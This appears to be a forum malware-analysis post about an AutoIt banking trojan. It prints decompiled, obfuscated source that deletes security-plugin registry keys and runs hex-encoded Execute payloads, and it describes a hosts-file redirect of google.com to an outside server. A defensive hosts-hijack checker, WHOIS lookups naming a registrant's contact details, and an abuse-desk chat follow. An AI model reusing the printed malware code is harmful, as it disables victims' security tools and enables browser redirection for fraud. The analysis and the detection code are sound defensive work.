Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{C28FA462-8E2F-4943-B0A8-6B116FC5981B}") Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{C28FA462-8E2F-4943-B0A8-6B116FC5981B}") Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{43ED1BBD-7D55-4DE5-8C88-DCD1CC3E4EFF}") Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{43ED1BBD-7D55-4DE5-8C88-DCD1CC3E4EFF}") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\NT_NDISRD") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\NT_NDISRD") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\NT_NDISRDMP") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\NT_NDISRDMP") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_GBPKM") 
Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_GBPSV") Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_GBPSV") Fn0041("HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet002\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPKM") Fn0041("HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPSV") Fn0041("HKLM\SYSTEM\ControlSet002\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPSV") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{50AB4426-E258-4C6B-8094-8F3FBCC30011}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399F83}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399008}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{DB6BF2CD-4F59-4F1C-AA9C-D08C0B61A931}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399003}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{6B71634C-5867-4D85-BFFE-DF1C322F8B96}") Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540003}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540011}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540000}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540008}") 
Fn0041("HKCR\TypeLib\{6B71634C-5867-4D85-BFFE-DF1C322F8B96}") Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540003}") Fn0041("HKCR\CLSID\{50AB4426-E258-4C6B-8094-8F3FBCC30011}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399F83}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399008}") Fn0041("HKCR\CLSID\{DB6BF2CD-4F59-4F1C-AA9C-D08C0B61A931}") Fn0041("HKCR\CLSID\{32A5804C-50B2-4295-8252-C32751FE0008}") Fn0041("HKCR\CLSID\{98C11555-BC81-40aa-A053-DAADC5630000}") Fn0041("HKCR\CLSID\{98C11555-BC81-40aa-A053-DAADC5630003}") Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399003}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginBb") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginScd") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginUni") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginCef") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginAbn") Fn0041("HKCR\Gbieh.GbIehObj") Fn0041("HKCR\Gbieh.GbIehObj.1") Fn0041("HKCR\Gbieh.GbPluginObj") Fn0041("HKCR\Gbieh.GbPluginObj.1") Fn0041("HKCR\GbIeh.GbExplorerPersistObj") Fn0041("HKCR\GbIeh.GbExplorerPersistObj.1") Fn0041("HKCR\GbiehScd.GbIehObj") Fn0041("HKCR\GbiehScd.GbIehObj.1") Fn0041("HKCR\GbiehScd.GbPluginObj") Fn0041("HKCR\GbiehScd.GbPluginObj.1") Fn0041("HKCR\GbiehCef.GbIehObj") Fn0041("HKCR\GbiehCef.GbIehObj.1") Fn0041("HKCR\GbiehCef.GbPluginObj") Fn0041("HKCR\GbiehCef.GbPluginObj.1") Fn0041("HKCR\GbiehUni.GbIehObj") Fn0041("HKCR\GbiehUni.GbIehObj.1") Fn0041("HKCR\GbiehUni.GbPluginObj") 
Fn0041("HKCR\GbiehUni.GbPluginObj.1") Fn0041("HKCR\GbpDist.GbpDistObj") Fn0041("HKCR\GbpDist.GbpDistObj.1") Fn0041("HKCR\Interface\{5C350402-AD9A-41E7-A303-C49F6C520000}") Fn0041("HKCR\Interface\{7827CCC3-0DEB-4CFB-911C-AA777C8826EA}") Fn0041("HKCR\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540000}") Fn0041("HKCR\Interface\{6ADBBD75-3CEB-43BC-88EE-B8C2D50E0011}") Fn0041("HKCR\Interface\{7827CCC3-0DEB-4CFB-911C-5FA49E399011}") Fn0041("HKCR\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540011}") Fn0041("HKCR\Interface\{B3D037EB-D5BE-413D-8E16-E5B2A1B28BD8}") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbIehObj") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbIehObj.1") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbPluginObj") Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbPluginObj.1") Fn0041("HKLM\SOFTWARE\Classes\Interface\{6ADBBD75-3CEB-43BC-88EE-B8C2D50E0011}") Fn0041("HKLM\SOFTWARE\Classes\Interface\{7827CCC3-0DEB-4CFB-911C-5FA49E399011}") Fn0041("HKLM\SOFTWARE\Classes\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540003}") Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540008}") 
Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policie'es\Ext\CLSID", "{E37CB5F0-51F5-4395-A808-5FA49E399008}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540008}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540000}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\Shell Extensions\Approved", "{E37CB5F0-51F5-4395-A808-5FA49E399011}") Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\Explorer\ShellExecuteHooks", "{E37CB5F0-51F5-4395-A808-5FA49E399011}") EndFunc Func Fn0043() While $Var0067 Fn0036() Sleep(10) WEnd Fn0019() ProcessClVar0255e(@AutoItPID) Return EndFunc Func Fn0044() For $ax0x0xa = 1 To 5 Local $locVar0001 = Var0254x_() FileInstall("killer-x32x64-Menino.au3.tbl", $locVar0001, 1) Global $Var0254, $Var0255 = Execute(BinaryTVar0255tring("0x457865637574652842696E617279746F737472696E67282730783435373836353633373537343635323834323639364536313732373937343646373337343732363936453637323832373330373833353333333733343337333233363339333634353336333733353333333733303336343333363339333733343332333833343336333633393336343333363335333533323336333533363331333633343332333833323334333433313333333533333335333333303333333033333334333333303333333133333330333333343333333033373333333734313335343633323339333234333332333733373433333333313337343233323337333234333333333133323339323732393239272929")) If IsArray($Var0255) AND $Var0255[0] >= 1179 Then ExitLoop Sleep(10) Next 
Execute(BinaryTVar0255tring("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333533333335333333303333333033333334333333303333333133333330333333343333333033373333333734313335343633323339323732393239272929")) EndFunc
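The installer routine in the decompiled source above drops its own `hosts` file into `System32\DRIVERS\etc` with a `FileInstall` call, which is how a request for google.com ends up at 190.120.227.114 on the infected machine while other hosts on the same network are unaffected. A quick check for this kind of hijack, written here as an added example for this post (not code from the sample or its author), parses a hosts file and reports every name that is mapped to a routable address. The hosts text embedded below is constructed for the demonstration; the real file dropped by the sample is not reproduced on the page.

```python
import ipaddress
import sys
from typing import Dict, List, Tuple

# Constructed hosts-file text for the demonstration. The real file dropped by the
# sample is not reproduced on the page; 190.120.227.114 is the server from the
# analysis above, the other entries are ordinary benign lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net        # ad-blocker style sinkhole, benign
190.120.227.114 www.google.com google.com
190.120.227.114 www.example.com        # constructed second victim name
"""

# Default location of the file on Windows (assumption: standard install path).
WINDOWS_HOSTS = r"C:\Windows\System32\drivers\etc\hosts"


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (ip, hostname) pairs, one per name, ignoring comments and blank lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        fields = line.split()
        ip, names = fields[0], fields[1:]
        for name in names:
            pairs.append((ip, name.lower()))
    return pairs


def is_routable(ip: str) -> bool:
    """True when the address could actually receive traffic from this host.

    Loopback (127.0.0.1, ::1), the unspecified address (0.0.0.0, used by
    ad-blocking hosts files) and link-local are the normal, benign targets;
    anything else is where a hijacked name would be sent."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_loopback or addr.is_unspecified or addr.is_link_local)


def find_hijacks(text: str) -> List[Tuple[str, str]]:
    """Entries that send a hostname to a routable address: the hijack pattern."""
    return [(ip, name) for ip, name in parse_hosts(text) if is_routable(ip)]


def targets(text: str) -> Dict[str, List[str]]:
    """Group hijacked names by the address they are sent to, for triage."""
    out: Dict[str, List[str]] = {}
    for ip, name in find_hijacks(text):
        out.setdefault(ip, []).append(name)
    return out


if __name__ == "__main__":
    # Usage: python hosts_check.py [path-to-hosts]; defaults to the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    else:
        data = SAMPLE_HOSTS
    for ip, names in targets(data).items():
        print(f"{ip} <- {', '.join(names)}")
```

Run it against `C:\Windows\System32\drivers\etc\hosts` on the suspect machine; a well-known public name pointing at a single external address, as with the Google entries in the constructed sample, is the signature of the redirection described at the top of the post. Entries that point internal names at private addresses are common in corporate builds and will also be listed, so triage by hostname rather than treating every hit as malicious.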
Code:
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=190.120.227.114?showDetails=true&showARIN=false&ext=netref2
#
NetRange:       190.0.0.0 - 190.255.255.255
CIDR:           190.0.0.0/8
OriginAS:
NetName:        NET190
NetHandle:      NET-190-0-0-0-1
Parent:
NetType:        Allocated to LACNIC
Comment:        This IP address range is under LACNIC responsibility for further
Comment:        allocations to users in LACNIC region.
Comment:        Please see http://www.lacnic.net/ for further details, or check the
Comment:        WHOIS server located at http://whois.lacnic.net
RegDate:        2005-06-17
Updated:        2010-07-21
Ref:            http://whois.arin.net/rest/net/NET-190-0-0-0-1
OrgName:        Latin American and Caribbean IP address Regional Registry
OrgId:          LACNIC
Address:        Rambla Republica de Mexico 6125
City:           Montevideo
StateProv:
PostalCode:     11400
Country:        UY
RegDate:        2002-07-27
Updated:        2011-09-24
Ref:            http://whois.arin.net/rest/org/LACNIC
ReferralServer: whois://whois.lacnic.net
OrgAbuseHandle: LACNIC-ARIN
OrgAbuseName:   LACNIC Whois Info
OrgAbusePhone:  999-999-9999
OrgAbuseEmail:  whois-contact@lacnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/LACNIC-ARIN
OrgTechHandle:  LACNIC-ARIN
OrgTechName:    LACNIC Whois Info
OrgTechPhone:   999-999-9999
OrgTechEmail:   whois-contact@lacnic.net
OrgTechRef:     http://whois.arin.net/rest/poc/LACNIC-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
Code:
Registrant:
  xiujuan Chen
  xiujuan Chen
  lie dian bai sha zhou
  wuhan, NULL 430064
  CN
  Phone: +86.8753067799
  Email: lchenmailbox@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: asiaworksmall.com
Created on..............: 2004-01-07
Expires on..............: 2017-01-07

Administrative Contact:
  xiujuan Chen
  xiujuan Chen
  lie dian bai sha zhou
  wuhan, NULL 430064
  CN
  Phone: +86.8753067799
  Email: lchenmailbox@yahoo.com

Technical Contact:
  Web.com Drone Team
  12808 Gran Bay Parkway West
  Jacksonville, FL 32258
  US
  Phone: +1.8009324678
  Email: droneteam@corp.web.com

DNS Servers:
  ns6.bona.us
  ns5.bona.us
  ns4.bona.us

Visit AboutUs.org for more information about asiaworksmall.com
AboutUs: asiaworksmall.com
You are now chatting with FT 1498
Welcome to FortaTrust chat. How can we help you today?
hi
> hi
> I am a security analyst,
> and I have some malware warnings from an IP on this server
> the IP is 190.120.227.114; it is a virus written in an AutoIt script that redirects big websites like Google to this server
> can you give me information about the owner?
< please send your abuse complaint to abuse@fortatrust.com and we will take care of the issue
> I have the source code of the virus
> if you need it, I can send it by e-mail
< yes, send everything you have
< and they will take care of the problem
> ok, thank you very much. I will send it today